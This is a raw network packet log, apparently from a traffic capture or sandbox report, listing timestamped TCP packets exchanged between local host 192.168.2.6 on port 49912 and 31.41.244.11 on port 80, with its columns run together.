                                                                                                                                                                  Dec 18, 2024 11:09:27.969573021 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.969594002 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.969611883 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.970407963 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.970428944 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.970449924 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.970462084 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.971508026 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.971556902 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.971561909 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.971592903 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.972235918 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.972279072 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.972317934 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.972359896 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.973062992 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.973102093 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.973186016 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.973223925 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.974090099 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.974140882 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.974145889 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.974184036 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.975168943 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.975209951 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.975239992 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.975271940 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.976201057 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.976246119 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.976394892 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.976432085 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.977284908 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.977327108 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.977571011 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.977612019 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.978328943 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.978373051 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.978461027 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.978503942 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.979373932 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.979397058 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.979418039 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.979430914 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.980099916 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.980144024 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.980165958 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.980209112 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.980966091 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.981009007 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.981040955 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.981082916 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.982111931 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.982156992 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.982188940 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.982230902 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.982917070 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.982961893 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.983025074 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.983067036 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.983858109 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.983917952 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.983918905 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.983963966 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.984436035 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.984477043 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.984550953 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.984586954 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.985511065 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.985572100 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.985614061 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.985650063 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.986371994 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.986413002 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.986520052 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.986557961 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.987495899 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.987535000 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.987541914 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.987581968 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.988451004 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.988492966 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.988535881 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.988573074 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.989352942 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.989393950 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.989531994 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.989568949 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.990375996 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.990417957 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.990444899 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.990480900 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.991461992 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.991503000 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.991698980 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.991736889 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.992444038 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.992468119 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.992485046 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.992501974 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.993366003 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.993407965 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.993474007 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.993506908 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.994292974 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.994344950 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.994401932 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.994437933 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.995263100 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.995323896 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.995382071 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.995417118 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.996244907 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.996310949 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.996346951 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.996381998 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.997226000 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.997270107 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.997338057 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.997378111 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.998353004 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.998394966 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.998498917 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.998543024 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.999533892 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.999574900 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.999620914 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.999655962 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.000675917 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.000716925 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.000749111 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.000790119 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.001492977 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.001534939 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.001610994 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.001652002 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.002650023 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.002691984 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.002844095 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.002887011 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.003918886 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.003959894 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.004086971 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.004125118 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.005244970 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.005291939 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.147896051 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.147912025 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.147958994 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.147994041 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.148041010 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.148082018 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.148082018 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.148121119 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.148900986 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.148936033 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.148941994 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.148973942 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.150748968 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.150790930 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.150800943 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.150824070 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.150845051 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.150911093 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.150950909 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.151180983 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.151226044 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.151283026 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.151336908 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.152230978 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.152278900 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.152667999 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.152710915 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.153541088 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.153590918 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.153765917 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.153799057 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.154803991 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.154853106 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.154957056 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.155000925 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.155607939 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.155649900 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.155682087 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.155718088 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.156502008 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.156541109 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.156596899 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.156630993 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.157284975 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.157331944 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.157377958 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.157422066 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.158111095 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.158150911 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.158466101 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.158502102 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.158830881 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.158876896 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.158901930 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.159173965 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.159470081 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.159511089 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.159573078 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.159619093 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.160433054 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.160474062 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.160506010 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.160545111 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.161572933 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.161614895 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.161672115 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.161710024 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.162808895 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.162822008 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.162844896 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.162866116 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.163609982 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.163655043 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.163683891 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.163722992 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.164417982 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.164429903 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.164450884 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.164469004 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.164922953 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.164943933 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.164966106 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.164992094 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.165637016 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.165682077 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.165913105 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.165949106 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.166450024 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.166490078 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.166511059 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.166548014 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.167541981 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.167586088 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.167737961 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.167778015 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.168801069 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.168839931 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.168999910 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.169037104 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.169543982 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.169565916 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.169579983 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.169596910 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.170150995 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.170165062 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.170192957 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.170202971 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.170687914 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.170723915 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.170787096 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.170830011 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.171310902 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.171361923 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.171418905 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.171451092 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.172008991 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.172034979 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.172055960 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.172074080 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.172864914 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.172919035 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.172981977 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.173026085 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.173893929 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.173935890 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.173988104 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.174021006 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.174885035 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.174937010 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.174997091 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.175035954 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.175832033 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.175878048 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.175967932 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.176003933 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.176985979 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.176999092 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.177027941 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.177045107 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.177995920 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.178009033 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.178037882 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.178060055 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.178795099 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.178847075 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.178916931 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.178917885 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.179761887 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.179805994 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.179863930 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.179902077 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.180793047 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.180855989 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.180923939 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.180960894 CET4991280192.168.2.631.41.244.11
